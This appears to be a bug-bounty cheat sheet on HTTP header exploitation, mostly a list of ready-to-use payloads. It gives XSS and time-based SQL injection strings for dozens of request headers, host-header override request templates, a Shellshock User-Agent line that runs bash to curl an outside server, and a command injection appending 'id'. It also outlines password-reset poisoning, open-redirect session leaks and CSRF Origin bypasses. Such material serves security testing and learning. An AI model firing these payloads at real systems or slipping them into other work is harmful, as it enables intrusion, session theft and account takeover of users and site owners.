HTTP Header Exploitation

Request Header payloads (xss, SQLi, etc.)

Misused or improperly validated headers can lets an attacker:

• Bypass login flows

• Steal sessions

• Hijack OAuth tokens

• Abuse password reset links

• Trick backend logic

• Referer: Tells the server which page the request came from

• Origin: Specifies the domain where the request originated

• Host: Indicates the target host being requested

Basic Payload

X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)>

X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'

Cookie: 'XOR(if(now()=sysdate(),sleep(10),0))XOR'

User-Agent: "XOR(if(now()=sysdate(),sleep(10),0))XOR"

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Testing

1. Change the host header

GET /index.php HTTP/1.1
Host: evil-website.com
...

1. Duplicating the host header

GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...

1. Add line wrapping

GET /index.php HTTP/1.1
 Host: vulnerable-website.com
Host: evil-website.com
...

1. Add host override headers

X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com

How to use? In this case im using "X-Forwarded-For : evil.com"

GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : evil-website.com
...

1. Supply an absolute URL

GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...

XSS

Blind XX

XSS

Command Injection

User-Agent: () { :; }; /bin/bash -c 'curl http://your-server.com'
X-Forwarded-For: 127.0.0.1; id

SQLi

Accept: "' or sleep(30)='"
Accept-Charset: "' or sleep(30)='"
Accept-Datetime: "' or sleep(30)='"
Accept-Encoding: "' or sleep(30)='"
Accept-Language: "' or sleep(30)='"
Authorization: "' or sleep(30)='"
Cache-Control: "' or sleep(30)='"
Connection: "' or sleep(30)='"
Content-Length: "' or sleep(30)='"
Content-MD5: "' or sleep(30)='"
Content-Type: "' or sleep(30)='"
Cookie: "' or sleep(30)='"
Date: "' or sleep(30)='"
Expect: "' or sleep(30)='"
Forwarded: "' or sleep(30)='"
From: "' or sleep(30)='"
If-Match: "' or sleep(30)='"
If-Modified-Since: "' or sleep(30)='"
If-None-Match: "' or sleep(30)='"
If-Range: "' or sleep(30)='"
If-Unmodified-Since: "' or sleep(30)='"
Max-Forwards: "' or sleep(30)='"
Origin: "' or sleep(30)='"
Pragma: "' or sleep(30)='"
Proxy-Authorization: "' or sleep(30)='"
Range: "' or sleep(30)='"
Referer: "' or sleep(30)='"
TE: "' or sleep(30)='"
Upgrade: "' or sleep(30)='"
User-Agent: "' or sleep(30)='"
Via: "' or sleep(30)='"
Warning: "' or sleep(30)='"
X-Client-IP: "' or sleep(30)='"
X-Remote-IP: "' or sleep(30)='"
X-Remote-Addr: "' or sleep(30)='"
X-Forwarded-For: "' or sleep(30)='"
X-Originating-IP: "' or sleep(30)='"
X-Host: "' or sleep(30)='"
X-Forwarde-Host: "' or sleep(30)='"

Time Based SQLi

GitHub - danialhalo/SqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP HeadersGitHub

#BugBounty —” Database hacked of India’s Popular Sports company”-Bypassing Host Header to SQL…Medium

Open Redirect + Referer → Session Leak

Open Redirection

Scenario

• A login page redirects users after authentication.

• The Referer header is used to determine the “safe” redirect destination.

• But there’s no validation on it.

Exploit Flow

1. Attacker sends victim to a login link with a crafted Referer like evil.com.

2. Server blindly trusts the header and sends a redirect to that external domain.

3. If session tokens or SSO codes are passed along, they’re exposed.

OAuth / Okta Misconfiguration

Host Header Injection → Password Reset Poisoning

Password Reset

Scenario

• A password reset link is emailed to the user.

• The link is constructed using the Host header.

Exploit Flow

1. Attacker intercepts a password reset request (or initiates it on behalf of a user).

2. They modify the Host header to their domain: evil.com.

3. The server builds the reset link like: https://evil.com/reset?token=abcd1234

4. The user receives this link and clicks it, revealing the reset token to the attacker.

CSRF + Origin Header Bypass

CSRF

Scenario

• A server uses Origin header to validate POST requests.

• But it only partially matches or ignores subdomains.

Exploit Flow

1. The server expects Origin: https://example.com.

2. Attacker sends Origin: https://evil.example.com — which still passes.

3. CSRF protections are bypassed.

Try bypassing Origin and Referer checks with:

• Similar subdomains

• Capitalization

• Multiple headers (e.g., X-Origin, X-Forwarded-Host)

Tool

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Resources

Mastering HTTP Header Exploitation | YesWeHack Learning Bug Bounty

Hidden in Headers: The Power of Misused Referer, Origin, and Host HeadersMr. Plan ₿ Publication

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.